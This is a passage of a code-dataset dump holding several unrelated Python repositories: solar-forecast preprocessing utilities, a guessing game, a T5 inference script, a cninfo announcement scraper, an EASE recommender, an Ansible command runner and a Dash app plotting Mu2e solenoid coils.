X_test\n \n#A function which takes the mean out of every 4th column and saves it on the time on the time of the 4th. Makes it so it is every hour.\n#TODO: Should be swapped for Gustavs code!\ndef mean_df(df):\n # Assuming df is your DataFrame and 'date_forecast' is your date column\n # Making a copy of the DataFrame to avoid modifying the original data\n df_copy = df.copy()\n \n # Step 1: Keeping every 4th row in the date column\n date_column = df_copy['date_forecast'].iloc[::4]\n \n #Made it such that all the intresting columns having data for 1 hour average back in time is saved such for the last hour. Ex diffuse_rad_1h:j cl. 23:00 is used for the weather prediction 22:00\n selected_col = ['diffuse_rad_1h:J', 'direct_rad_1h:J', 'clear_sky_energy_1h:J']\n selected_values = df_copy[selected_col].iloc[4::4].reset_index(drop=True)\n last_row = pd.DataFrame(df_copy[selected_col].iloc[-1]).T.reset_index(drop=True)\n selected_values = pd.concat([selected_values, last_row], ignore_index=True)\n \n # Step 2: Creating a grouping key\n grouping_key = np.floor(np.arange(len(df_copy)) / 4)\n \n # Step 3: Group by the key and calculate the mean, excluding the date column\n averaged_data = df_copy.drop(columns=['date_forecast']).groupby(grouping_key).mean()\n # Step 4: Reset index and merge the date column\n averaged_data.reset_index(drop=True, inplace=True)\n averaged_data['date_forecast'] = date_column.values\n averaged_data[selected_col] = selected_values.values\n return averaged_data\n\n#Saves the predictions in proper format, y_pred needs to contain predicitions for all 3 locatoins\n\ndef submission(filename, y_pred, path_to_src):\n test = pd.read_csv(path_to_src + '/Data/CSV/test.csv')\n submission = pd.read_csv(path_to_src + '/Data/CSV/sample_submission.csv')\n test['prediction'] = y_pred\n submission = submission[['id']].merge(test[['id', 'prediction']], on='id', how='left')\n submission.to_csv(path_to_src + \"/Data/CSV/\" + filename, index=False)\n\ndef drop_repeating_sequences(df):\n indexes_to_drop = []\n prev_val = None\n consecutive_count = 0\n\n for i, val in enumerate(df[\"pv_measurement\"]):\n if val != 0:\n if val == prev_val:\n consecutive_count += 1\n else:\n prev_val = val\n consecutive_count = 0\n\n if consecutive_count >= 1:\n indexes_to_drop.extend([i - consecutive_count, i])\n\n return df.drop(indexes_to_drop)\n\ndef delete_ranges_of_zeros_and_interrupting_values(df, number_of_recurring_zeros, interrupting_values = []):\n count = 0\n drop_indices = []\n\n df = df.dropna()\n\n for index, row in df.iterrows():\n if row[\"pv_measurement\"] == 0 or row[\"pv_measurement\"] in interrupting_values:\n count += 1\n else:\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count:index])\n count = 0\n\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count + 1:index + 1])\n\n df.drop(drop_indices, inplace=True)\n\n return df\n\ndef drop_long_sequences(df, x):\n indexes_to_drop = []\n zero_count = 0\n\n for i, val in enumerate(df['pv_measurement']):\n if val == 0:\n zero_count += 1\n else:\n if zero_count >= x:\n start_index = i - zero_count\n end_index = i - 1 # inclusive\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n zero_count = 0\n\n # In case the sequence ends with zeros, this will handle it\n if zero_count >= x:\n start_index = len(df) - zero_count\n end_index = len(df) - 1\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n\n return df.drop(df.index[indexes_to_drop])\n\ndef clean_mean_combine(X_observed, X_estimated, selected_features):\n X_observed_clean = clean_df(X_observed, selected_features)\n X_estimated_clean = clean_df(X_estimated, selected_features)\n X_estimated_clean_mean = mean_df(X_estimated_clean)\n X_observed_clean_mean = mean_df(X_observed_clean)\n X_train = pd.concat([X_observed_clean_mean, X_estimated_clean_mean])\n return X_train\n\ndef prepare_X(X_observed, X_estimated, selected_features, wanted_months):\n X_observed = subset_months(X_observed.copy(), wanted_months)\n X_train = clean_mean_combine(X_observed, X_estimated, selected_features)\n X_train = add_lag_and_lead_features(X_train, 1, ['direct_plus_diffuse', 'direct_plus_diffuse_1h'])\n return X_train\n\ndef prepare_testdata_rf_a(X_test, selected_features):\n X_test = clean_df(X_test, selected_features)\n X_test = mean_df(X_test)\n X_test = add_lag_and_lead_features(X_test, 1, ['direct_plus_diffuse', 'direct_plus_diffuse_1h'])\n X_test = X_test.drop(columns = [\"date_forecast\"])\n return X_test\n\ndef add_all_features(df):\n df = direct_rad_div_diffuse_rad(df)\n df = agumenting_time(df)\n df[\"direct_plus_diffuse\"] = df[\"direct_rad:W\"] + df[\"diffuse_rad:W\"]\n df[\"direct_plus_diffuse_1h\"] = df[\"direct_rad_1h:J\"] + df[\"diffuse_rad_1h:J\"]\n return df\n\ndef subset_months(df, wanted_months):\n df[\"month\"] = df['date_forecast'].dt.month\n df_subset = df[df[\"month\"].isin(wanted_months)]\n return df_subset\n\ndef remove_all_predicted_values_during_given_time_frame(X_test_c, x_pred, hours_to_zero_out_b):\n new_df = pd.DataFrame({\n \"date_forecast\": X_test_c[\"date_forecast\"].iloc[::4].reset_index(drop=True),\n \"pv_measurement\": x_pred # Assuming x_pred is the correct variable here\n })\n\n # Convert 'date_forecast' to datetime and extract hour and month\n new_df[\"new_time\"] = pd.to_datetime(new_df['date_forecast'])\n new_df['hour'] = new_df['new_time'].dt.hour\n new_df[\"month\"] = new_df['new_time'].dt.month\n \n hourly_sum = new_df.groupby('hour')['pv_measurement'].sum()\n \"\"\"\n # Iterate through each hour and print the total sum of 'pv_measurements'\n print(\"before augmentation\")\n for hour, sum_pv in hourly_sum.items():\n print(f\"Hour {hour}: Total PV Measurements = {sum_pv}\")\n \"\"\" \n # Update pv_measurements to 0 based on the month-hour mapping\n for month, hours in hours_to_zero_out_b.items():\n new_df.loc[(new_df['month'] == month) & (new_df['hour'].isin(hours)), 'pv_measurement'] = 0\n \n #print_zeros(new_df)\n augmented_pv_measurements = new_df['pv_measurement']\n\n # Convert to array if needed\n augmented_pv_measurements_array = augmented_pv_measurements.to_numpy()\n return augmented_pv_measurements_array\n\ndef add_lag_and_lead_features(df, lag_steps=1, columns = []):\n # Create a new DataFrame to hold the lagged and lead features\n lagged_df = pd.DataFrame()\n\n # Make sure the 'date' column is a datetime type\n df['date_forecast'] = pd.to_datetime(df['date_forecast'])\n\n # Group by date to ensure continuity within each day\n grouped = df.groupby(df['date_forecast'].dt.date)\n\n for _, group in grouped:\n # Reset index to allow proper shifting within group\n group = group.reset_index(drop=True)\n\n # Copy the current group to avoid modifying the original data\n temp_group = group.copy()\n\n # Iterate over all columns to create lagged and lead versions\n for column in columns:\n # Skip the date column if it exists\n if column == 'date' or column == 'date_forecast':\n continue\n\n # Create lagged feature for previous values\n lagged_column_name = f\"{column}_lag{lag_steps}\"\n temp_group[lagged_column_name] = group[column].shift(lag_steps).fillna(group[column])\n\n # Create lead feature for future values\n lead_column_name = f\"{column}_lead{lag_steps}\"\n temp_group[lead_column_name] = group[column].shift(-lag_steps).fillna(group[column])\n\n # Create a column for the difference between the lagged value and the present value (lag -1 - present)\n diff_lag_column_name = f\"{column}_diff_lag{lag_steps}\"\n temp_group[diff_lag_column_name] = temp_group[lagged_column_name] - group[column]\n\n # Create a column for the difference between the lead value and the present value (lag +1 - present)\n #diff_lead_column_name = f\"{column}_diff_lead{lag_steps}\"\n #temp_group[diff_lead_column_name] = temp_group[lead_column_name] - group[column]\n\n # Append the processed group to the lagged_df\n lagged_df = pd.concat([lagged_df, temp_group], axis=0)\n\n # Reset the index of the resulting DataFrame\n lagged_df = lagged_df.reset_index(drop=True)\n\n return lagged_df\n","repo_name":"yadert/TDT4173-ML-task","sub_path":"src/Models/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":18692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18639653551","text":"# Number Guessing Game Objectives:\n\n# Include an ASCII art logo.\n# Allow the player to submit a guess for a number between 1 and 100.\n# Check user's guess against actual answer. Print \"Too high.\" or \"Too low.\" depending on the user's answer.\n# If they got the answer correct, show the actual answer to the player.\n# Track the number of turns remaining.\n# If they run out of turns, provide feedback to the player.\n# Include two different difficulty levels (e.g., 10 guesses in easy mode, only 5 guesses in hard mode).\nimport random\n\nfrom numpy import number\n\n\ndef printNumberOfAttemp(number_of_guess):\n print(f\"You have {number_of_guess} attemps remaining to guess the number.\")\n\n\ndef isHigherOrLower(user_input, chosen_number, number_of_guess):\n if(user_input < chosen_number):\n print(\"Too Low\")\n number_of_guess -= 1\n return number_of_guess\n elif(user_input > chosen_number):\n print(\"Too High\")\n number_of_guess -= 1\n return number_of_guess\n else:\n print(\"This is the correct answer\")\n print(f\"The chosen number is {chosen_number}\")\n number_of_guess = 0\n return number_of_guess\n\n\ndef revealAnswer(chosen_number):\n print(f\"The chosen number is {chosen_number}\")\n\n\nnumber_of_guess = 0\nprint(\"Welcome to the Number Guessing Game!\")\nchosen_number = random.randint(1, 100)\nprint(\"I'm thinking of a number between 1 and 100.\")\ndifficulty = input(\"Choose a difficulty. Type 'easy' or 'hard': \").lower()\n\nif(difficulty == \"easy\"):\n number_of_guess = 10\nelse:\n number_of_guess = 5\n\nwhile(number_of_guess > 0):\n printNumberOfAttemp(number_of_guess)\n user_guess = int(input(\"Make a guess: \"))\n number_of_guess = isHigherOrLower(\n user_guess, chosen_number, number_of_guess)\n\nrevealAnswer(chosen_number)\n","repo_name":"supawichza40/100DaysCoding-Python","sub_path":"day_12/final_project-number_guessing_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43626159636","text":"import torch\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\n\ndef correct_text(model, tokenizer, input_text, max_length=512):\n input_ids = tokenizer(input_text, return_tensors=\"pt\", max_length=max_length, truncation=True).input_ids\n input_ids = input_ids.to(device)\n output_ids = model.generate(input_ids, num_beams=50, temperature=10.0, output_scores=True)\n print(output_ids)\n corrected_text = tokenizer.decode(output_ids[0][3:], skip_special_tokens=True)\n return corrected_text\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel = T5ForConditionalGeneration.from_pretrained(\"./trained_model\").to(device)\ntokenizer = T5Tokenizer.from_pretrained(\"./trained_model\", model_max_length=512)\n\n# Asegurarse de que el modelo esté en modo de evaluación\nmodel.eval()\n\n# Si está utilizando una GPU, mover el modelo a la GPU\nif torch.cuda.is_available():\n model.cuda()\n\n# Ejemplo de uso de la función correct_text\ninput_text = \"\"\n\ncorrected_text = correct_text(model, tokenizer, input_text)\nprint(f\"Texto original: {input_text}\")\nprint(f\"Texto corregido: {corrected_text}\")\n\n","repo_name":"Rodrigo9721/mbart_finetuning_for_text_correction","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39612012521","text":"import time\nfrom kits import reFormat \nfrom kits.reFormat import myTime\nimport kits.normRequests as requests\nfrom kits.asyncRequests import async_gets_jsons,async_downloads\nfrom kits.parsePdf import parse_pdf_mp\nfrom kits.multi_process import multi_process_star\nfrom kits import quickDb\nimport config\nfrom config import query_config\nQUERY_DICT = query_config.query_dict\n\nTABLE_INFO = {\n 'secCode':'VARCHAR(20) NOT NULL',\n 'secName':'VARCHAR(30) NOT NULL',\n 'orgId':'VARCHAR(50)',\n 'type':'VARCHAR(20)',\n 'announcementId':'VARCHAR(30) NOT NULL',\n 'announcementTitle':'VARCHAR(100) NOT NULL',\n 'announcement_title':'VARCHAR(100) NOT NULL',\n 'announcementTime':'BIGINT UNSIGNED',\n 'announcement_year':'YEAR', # 实际时间如'2018'\n 'adjunctUrl':'VARCHAR(100) NOT NULL',\n 'record_time':'DATE', # 记录日期\n 'pages_num':'INT UNSIGNED',\n 'words_num':'BIGINT UNSIGNED'\n}\nTABLE_PRIMARY = 'announcementId'\n\n\n\ndef get_json_from_juchao(search_dict):\n\n for key,value in search_dict.items():\n if type(value) == list:\n multi_key = key\n values_list = value\n search_dict[multi_key] = f\"\"\"{{{multi_key}}}\"\"\"\n mode = \"coroutine\"\n break\n else:\n mode = \"singal\" \n # 获取url\n url = 'http://www.cninfo.com.cn/new/fulltextSearch/full?searchkey={searchkey}'\\\n '&sdate={sdate}'\\\n '&edate={edate}'\\\n '&isfulltext={isfulltext}'\\\n '&sortName={sortName}'\\\n '&sortType={sortType}'\\\n '&pageNum={pageNum}&type={type}'.format(**search_dict)\n if mode == \"singal\":\n response = requests.get(url,)\n res = response.json()\n elif mode == \"coroutine\":\n urls = [url.format(**{multi_key:value}) for value in values_list]\n res = async_gets_jsons(urls)\n return res\n \n\ndef get_num_pages_from_json(json_dict):\n import math\n return math.ceil(json_dict['totalAnnouncement']/10)\n\n\ndef query_all_dicts(param_dict):\n \"\"\"\n 返回所有查询结果(字典列表)\n \"\"\"\n # 该字典为查询条件,值为None的表明可被param_dict更新,但请勿更改关键字key\n Fix_query_dict = {\n # 搜索的关键词,如【'企业社会责任'】\n 'searchkey':None,\n # 发布起始时间,如【'2023-01-04'】【''表示不进行限制 】 \n 'sdate':None, \n # 发布截止时间,如【'2023-02-24'】【''表示不进行限制 】\n 'edate':None, \n # 是否进行全文搜索,【'false'为只搜索标题,'true'为搜索全文 】\n 'isfulltext':None, \n # 按什么进行排序,【'pubdate'为按时间排序,'stockcode_cat'为按代码排序,'nothing'为按相关度排序 】\n 'sortName':'stockcode_cat', \n # 升序还是降序,【'asc'为升序,'desc'为降序 】\n 'sortType':'asc', \n # 页码,【如'1'】\n 'pageNum':'1', \n # 板块筛选,【''为全部板块,'shj'为深沪京,'s'为三板... 】\n 'type':None, \n }\n Fix_query_dict.update(param_dict)\n json_res = get_json_from_juchao(search_dict=Fix_query_dict)\n num_pages = get_num_pages_from_json(json_res)\n Fix_query_dict['pageNum'] = [i+1 for i in range(num_pages)]\n json_of_pages = get_json_from_juchao(search_dict=Fix_query_dict)\n \n dicts_list = []\n for json_of_page in json_of_pages:\n announcements_list = json_of_page['announcements']\n dicts_list += announcements_list\n \n [dict_.update({'type':Fix_query_dict['type']}) for dict_ in dicts_list]\n return dicts_list\n \n\ndef reformat_dict(an_dict):\n \"\"\"用于格式化字典:会将格式化后的关键字作为dataframe的columns\n \"\"\"\n # {'id': None, 'secCode': '000039', 'secName': '中集集团', \n # 'orgId': 'gssz0000039', 'announcementId': '1204526484', \n # 'announcementTitle': '中集集团:2017年社会责任暨环境、社会及管治报告', \n # 'announcementTime': 1522166400000, 'adjunctUrl': 'finalpage/2018-03-28/1204526484.PDF', \n # 'adjunctSize': 2190, 'adjunctType': 'PDF', 'storageTime': None, \n # 'columnId': '09020202||250101||251302', 'pageColumn': 'SZZB', \n # 'announcementType': '01010503||010112||01239999', 'associateAnnouncement': None, \n # 'important': None, 'batchNum': None, 'announcementContent': None, 'orgName': None, \n # 'announcementTypeName': None}\n\n # 关系到columns的一致性,请谨慎更改该字典\n res_dict = {\n 'secCode':an_dict['secCode'],\n 'secName':an_dict['secName'],\n 'orgId':an_dict['orgId'],\n 'type':an_dict['type'],\n 'announcementId':an_dict['announcementId'],\n 'announcementTitle':an_dict['announcementTitle'],\n 'announcement_title':reFormat.remove_em(an_dict['announcementTitle']),\n 'announcementTime':an_dict['announcementTime'],\n 'announcement_year':myTime(an_dict['announcementTime']/1000).year, # 实际时间如'2018'\n 'adjunctUrl':an_dict['adjunctUrl'],\n 'record_time':myTime(time.time()).date, # 记录日期\n }\n l = len(res_dict.keys())\n # 确保写入的一致性\n assert list(res_dict.keys()) == list(TABLE_INFO.keys())[:l]\n # print(remove_em(an_dict['announcementTitle']))\n return res_dict\n\n\ndef filter_dicts(res_dicts,reject_list):\n res_dicts = [res_dict for res_dict in res_dicts \n if reFormat.maintain_or_not(res_dict['announcement_title'],reject_list=reject_list)]\n return res_dicts\n\n\ndef download_from_dicts(res_dicts,to_dir):\n \"\"\"将传入的res_dicts中的每一项提取其中的pdf链接进行下载,返回下载完成后对应的文件路径(列表)\"\"\"\n pdf_urls = [(dict0['announcement_title']+'.pdf','http://static.cninfo.com.cn/'+dict0['adjunctUrl']) for dict0 in res_dicts]\n # 使用协程下载pdf文件,并返回所有文件下载到的路径(类型:tuple)\n dirs = async_downloads(pdf_urls,to_dir)\n return dirs\n\n\nif __name__=='__main__':\n\n db = quickDb.MyDb()\n db.close()\n\n TABLE_NAME_search = QUERY_DICT['searchkey']\n # 返回搜索结果(字典列表)\n dicts = query_all_dicts(param_dict=QUERY_DICT)\n # 格式化搜索结果→将存入csv/数据库的格式\n res_dicts = [reformat_dict(announcement) for announcement in dicts]\n # 筛掉一部分含某些关键词的,如\"英文版\"\n res_dicts = filter_dicts(res_dicts,reject_list=['英文版',])\n # 对传入的res_dicts进行裁剪(可用于分布式)\n print(f\"满足条件的共有:【 {len(res_dicts)}条 】\")\n l,r = reFormat.extra_range(input(\"\"\"请选择处理的范围,如:\n 【 0,3 】表示从第0条开始到第2条(左闭右开),\n 【 3, 】表示从3开始到最后一个,\n 【 ,-1 】表示从第0个到倒数第2个\n \"\"\"))\n res_dicts = res_dicts[l:r]\n # 赋值SEARCH_RES_NAME作为保存此次分析结果的id,形如\"社会及管治___false_shj_0_10\"\n\n # 生成所有announcement的pdf文件的名称和下载列表,将用协程下载\n #SEARCH_RES_NAME = f\"{'_'.join(QUERY_DICT.values())}_{l}_{r}\"\n SEARCH_RES_NAME = f\"{'_'.join(QUERY_DICT.values())}\"\n dirs = download_from_dicts(res_dicts,f'./data/search_res/{SEARCH_RES_NAME}')\n\n # multiprocess\n import multiprocessing\n\n # 使用多进程分析pdf列表,返回结果字典列表(每个字典对应一个pdf的分析结果)\n value = multiprocessing.Manager().Value('i',0)\n lock = multiprocessing.Manager().Lock()\n total_num = len(dirs)\n args_list = list(zip(dirs,[value]*total_num,[total_num]*total_num,[lock]*total_num))\n parse_res = multi_process_star(parse_pdf_mp,args_list)\n # 用pdf列表的分析结果更新res_dicts\n [res_dict.update(pdf_res_dict) for pdf_res_dict,res_dict in zip(parse_res,res_dicts)]\n\n # 确保写入的一致性\n assert list(res_dicts[0].keys()) == list(TABLE_INFO.keys())\n\n\n db = quickDb.MyDb('Juchao')\n db.execute(quickDb.generate_create_sql(table_name=TABLE_NAME_search,columns_infos_dict=TABLE_INFO,primary_key=TABLE_PRIMARY))\n # 写入announcements结果\n db.execute(quickDb.generate_insert_sql(table_name=TABLE_NAME_search,input_args=res_dicts))\n db.commit()\n db.close()\n\n","repo_name":"Arcsincode/parse_code","sub_path":"search_main.py","file_name":"search_main.py","file_ext":"py","file_size_in_byte":8251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"75058174802","text":"from scipy.sparse import csr_matrix\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom multiprocessing import Pool, cpu_count\n\n\nclass EASE:\n def __init__(self):\n self.user_enc = LabelEncoder()\n self.item_enc = LabelEncoder()\n\n def _get_users_and_items(self, df):\n users = self.user_enc.fit_transform(df.loc[:, 'user_id'])\n items = self.item_enc.fit_transform(df.loc[:, 'item_id'])\n return users, items\n\n def fit(self, df, lambda_: float = 0.5, implicit=True):\n \"\"\"\n df: pandas.DataFrame with columns user_id, item_id and (rating)\n lambda_: l2-regularization term\n implicit: if True, ratings are ignored and taken as 1, else normalized ratings are used\n \"\"\"\n users, items = self._get_users_and_items(df)\n values = (\n np.ones(df.shape[0])\n if implicit\n else df['rating'].to_numpy() / df['rating'].max()\n )\n\n X = csr_matrix((values, (users, items)))\n self.X = X\n\n G = X.T.dot(X).toarray()\n diagIndices = np.diag_indices(G.shape[0])\n G[diagIndices] += lambda_\n P = np.linalg.inv(G)\n B = P / (-np.diag(P))\n B[diagIndices] = 0\n\n self.B = B\n self.pred = X.dot(B)\n\n def predict(self, train, users, items, k):\n items = self.item_enc.transform(items)\n dd = train.loc[train.user_id.isin(users)]\n dd['ci'] = self.item_enc.transform(dd.item_id)\n dd['cu'] = self.user_enc.transform(dd.user_id)\n g = dd.groupby('cu')\n with Pool(cpu_count()) as p:\n user_preds = p.starmap(\n self.predict_for_user,\n [(user, group, self.pred[user, :], items, k) for user, group in g],\n )\n df = pd.concat(user_preds)\n df['item_id'] = self.item_enc.inverse_transform(df['item_id'])\n df['user_id'] = self.user_enc.inverse_transform(df['user_id'])\n return df\n\n @staticmethod\n def predict_for_user(user, group, pred, items, k):\n watched = set(group['ci'])\n candidates = [item for item in items if item not in watched]\n pred = np.take(pred, candidates)\n res = np.argpartition(pred, -k)[-k:]\n r = pd.DataFrame(\n {\n \"user_id\": [user] * len(res),\n \"item_id\": np.take(candidates, res),\n \"score\": np.take(pred, res),\n }\n ).sort_values('score', ascending=False)\n return r\n","repo_name":"Darel13712/ease_rec","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"3"}
+{"seq_id":"73463574160","text":"# coding=utf-8\r\n# @Time : 2019/7/2 17:13\r\n# @Author : zwa\r\n# coding:utf-8\r\n\r\nimport json\r\nfrom collections import namedtuple\r\nfrom ansible.parsing.dataloader import DataLoader\r\nfrom ansible.vars.manager import VariableManager\r\nfrom ansible.inventory.manager import InventoryManager\r\nfrom ansible.playbook.play import Play\r\nfrom ansible.executor.task_queue_manager import TaskQueueManager\r\nfrom ansible.plugins.callback import CallbackBase\r\n\r\n\r\nclass ResultsCollector(CallbackBase):\r\n \"\"\"重构执行结果\"\"\"\r\n def __init__(self, *args, **kwargs):\r\n super(ResultsCollector, self).__init__(*args, **kwargs)\r\n self.host_ok = {}\r\n self.host_unreachable = {}\r\n self.host_failed = {}\r\n\r\n def v2_runner_on_unreachable(self, result, *args, **kwargs):\r\n \"\"\"不可达\"\"\"\r\n self.host_unreachable[result._host.get_name()] = result\r\n\r\n def v2_runner_on_ok(self, result, *args, **kwargs):\r\n \"\"\"执行成功\"\"\"\r\n self.host_ok[result._host.get_name()] = result\r\n\r\n def v2_runner_on_failed(self, result, *args, **kwargs):\r\n \"\"\"执行失败\"\"\"\r\n self.host_failed[result._host.get_name()] = result\r\n\r\n\r\ndef run_ansible(module_name,module_args,host_list,option_dict):\r\n # 初始化需要的对象\r\n Options = namedtuple('Options',\r\n ['connection', 'module_path', 'forks', 'become',\r\n 'become_method', 'private_key_file','become_user',\r\n 'remote_user', 'check', 'diff']\r\n )\r\n #负责查找和读取yaml、json和ini文件\r\n loader = DataLoader()\r\n\r\n options = Options(connection='ssh', module_path=None, forks=5, become=option_dict['become'],\r\n become_method='sudo',private_key_file=\"/root/.ssh/id_rsa\",\r\n become_user='root', remote_user=option_dict['remote_user'], check=False, diff=False\r\n )\r\n\r\n passwords = dict(vault_pass='secret')\r\n\r\n # 实例化ResultCallback来处理结果\r\n callback = ResultsCollector()\r\n\r\n # 创建库存(inventory)并传递给VariableManager\r\n inventory = InventoryManager(loader=loader, sources=['/etc/ansible/hosts'])\r\n variable_manager = VariableManager(loader=loader, inventory=inventory)\r\n\r\n # 创建任务\r\n host = \",\".join(host_list)\r\n play_source = dict(\r\n name=\"Ansible Play\",\r\n hosts=host,\r\n gather_facts='no',\r\n tasks=[\r\n dict(action=dict(module=module_name, args=module_args), register='shell_out'),\r\n ]\r\n )\r\n play = Play().load(play_source, variable_manager=variable_manager, loader=loader)\r\n\r\n # 开始执行\r\n tqm = None\r\n\r\n tqm = TaskQueueManager(\r\n inventory=inventory,\r\n variable_manager=variable_manager,\r\n loader=loader,\r\n options=options,\r\n passwords=passwords,\r\n stdout_callback=callback,\r\n )\r\n result = tqm.run(play)\r\n\r\n result_raw = {'success': {}, 'failed': {}, 'unreachable': {}}\r\n\r\n for host, result in callback.host_ok.items():\r\n result_raw['success'][host] = result._result['stdout_lines']\r\n\r\n for host, result in callback.host_failed.items():\r\n result_raw['failed'][host] = result._result['stderr_lines']\r\n\r\n for host, result in callback.host_unreachable.items():\r\n result_raw['unreachable'][host] = result._result[\"msg\"]\r\n\r\n return json.dumps(result_raw, indent=4)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n option_dict={\"become\":True,\"remote_user\":\"root\"}\r\n module_name = 'shell'\r\n module_args = \"ls /root\"\r\n host_list = ['192.168.3.16']\r\n ret = run_ansible(module_name,module_args,host_list,option_dict)\r\n print(ret)\r\n print(eval(ret))\r\n print(ret)\r\n \r\n","repo_name":"airring/k8s_install","sub_path":"script/Ansible_task.py","file_name":"Ansible_task.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"31096962946","text":"import pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import cm\nfrom Plot_update import *\n\nimport dash\nfrom dash import Dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\n#geom_df_mu2e = pd.read_pickle('/home/shared_data/helicalc_params/Mu2e_Coils_Conductors.pkl')\n\ndf_bars = pd.read_csv(datadir + \"Mu2e_Longitudinal_Bars_V13.csv\")\ndff = df_bars.assign(ending_z = df_bars['z0'] + df_bars['length'])\n\n\n\n\napp = dash.Dash(__name__)\n\n\napp.layout = html.Div([\nhtml.Div(children=[html.Div([\n html.H1(children = 'Current Continuity')])]),\nhtml.Div(\n [\n html.Div(\n [\n html.H6(\"\"\"Select Solenoid\"\"\",\n style={'margin-right': '2em'})\n ],\n\n ),\n dcc.Dropdown(\n id='solenoid-dropdown',\n options=[\n {'label': 'Production Solenoid (PS)', 'value': 'PS'},\n {'label': 'Transport Solenoid (TS)', 'value': 'TS'},\n {'label': 'Detector Solenoid (DS)', 'value': 'DS'},\n ], value = 'DS',\n\n )\n ],\n #style=dict(display='flex')\n ),\n\nhtml.Div(\n [\n html.I(\"Input starting and ending Z to plot [must be within 3.74888 and 13.64073] \"),\n html.Br(),\n dcc.Input(id=\"input1\", type=\"number\", placeholder=\"\", style={'marginRight':'10px'}, value = 3.74888 ),\n dcc.Input(id=\"input2\", type=\"number\", placeholder=\"\", value = 13.64073, debounce=True),\n html.Div(id=\"output\"),\n ]\n),\n\n\n\n html.Div([\n html.Div([\n html.H3('Plot of Entire Selected Solenoid'),\n dcc.Graph(id=\"Coil1\")\n #style={'width': '90vh', 'height': '90vh'})\n ],className=\"six columns\"),\n html.Div([\n html.H3('Plot of Coils and Longitudinal Bars within Z Range'),\n dcc.Graph(id=\"Coil2\", style={'width': '90vh', 'height': '90vh'})\n ], className=\"six columns\"), ], className=\"row\" ),\n\n\n\n])\n\ncamera = dict(\n up = dict(x=0, y=1, z=0),\n center = dict(x=0, y=0, z=0),\n eye = dict(x=-2, y=1.25, z=-1.25)\n)\n\n\n@app.callback(\n Output('Coil1', 'figure'),\n Input('solenoid-dropdown', 'value'))\n\ndef update_output(input_solenoid):\n df_raw = load_data(\"Mu2e_Coils_Conductors.pkl\")\n\n solenoid = input_solenoid\n\n in_solenoid = df_raw.loc[df_raw['Solenoid'] == solenoid]\n\n num_first = in_solenoid[\"Coil_Num\"].iloc[0]\n num_last = in_solenoid[\"Coil_Num\"].iloc[-1]\n\n cyl = go.Figure()\n\n\n for num in range(num_first, num_last):\n x, y, z = get_thick_cylinder_surface_xyz(df_raw, num)\n\n cyl.add_traces(data=go.Surface(x=x, y=y, z=z,\n surfacecolor = np.ones_like(x),\n colorscale = [[0, 'red'], [1, 'red']],\n showscale=False,\n showlegend=False,\n name='Coils (radial center)',\n ))\n\n cyl.update_layout(title=f'{solenoid} Coils',\n scene = dict(aspectmode = 'data', camera = camera),\n autosize = False, width = 1600, height = 800\n )\n return cyl\n\n@app.callback(\n Output('Coil2', 'figure'),\n [Input('input1', 'value'), Input('input2', 'value')])\n\ndef update_coils(start_z_selected, end_z_selected):\n df_raw = load_data(\"Mu2e_Coils_Conductors.pkl\")\n\n coils = df_raw.query(f'z < {end_z_selected} and z >= {start_z_selected}')\n bars = dff.query(f'z0 < {end_z_selected} and z0 >= {start_z_selected}')\n num_first = coils[\"Coil_Num\"].iloc[0]\n num_last = coils[\"Coil_Num\"].iloc[-1]\n\n cyl2 = go.Figure()\n index = bars.index\n idx = index.tolist()\n\n for num in range(num_first, num_last):\n x, y, z = get_thick_cylinder_surface_xyz(df_raw, num)\n\n cyl2.add_traces(data=go.Surface(x=x, y=y, z=z,\n surfacecolor=np.ones_like(x),\n colorscale=[[0, 'red'], [1, 'red']],\n showscale=False,\n showlegend=False,\n name='Coils (radial center)',\n ))\n for i in idx:\n z_start = df_bars['z0'].iloc[i]\n z_end = df_bars['z0'].iloc[i] + df_bars['length'].iloc[i]\n z_values = np.arange(z_start, z_end)\n\n num = len(z_values)\n x_values = [df_bars['x0'].iloc[i]] * num\n y_values = [df_bars['y0'].iloc[i]] * num\n\n cyl2.add_traces(data=go.Scatter3d(\n x=x_values, y=y_values, z=z_values,\n marker=dict(\n size=4,\n color='red',\n # colorscale='Viridis',\n ),\n line=dict(\n color='darkblue',\n width=2\n )\n ))\n cyl2.update_layout(title= f'DS Coils and Longitudinal Bars from Z range {start_z_selected} to {end_z_selected}',\n scene=dict(aspectmode='data', camera=camera),\n autosize=False, width=1600, height=800\n )\n return cyl2\n\n\n\n\n\n\napp.run_server(debug=True)\n\n\n\n","repo_name":"Lszemraj/Current-Continuity","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
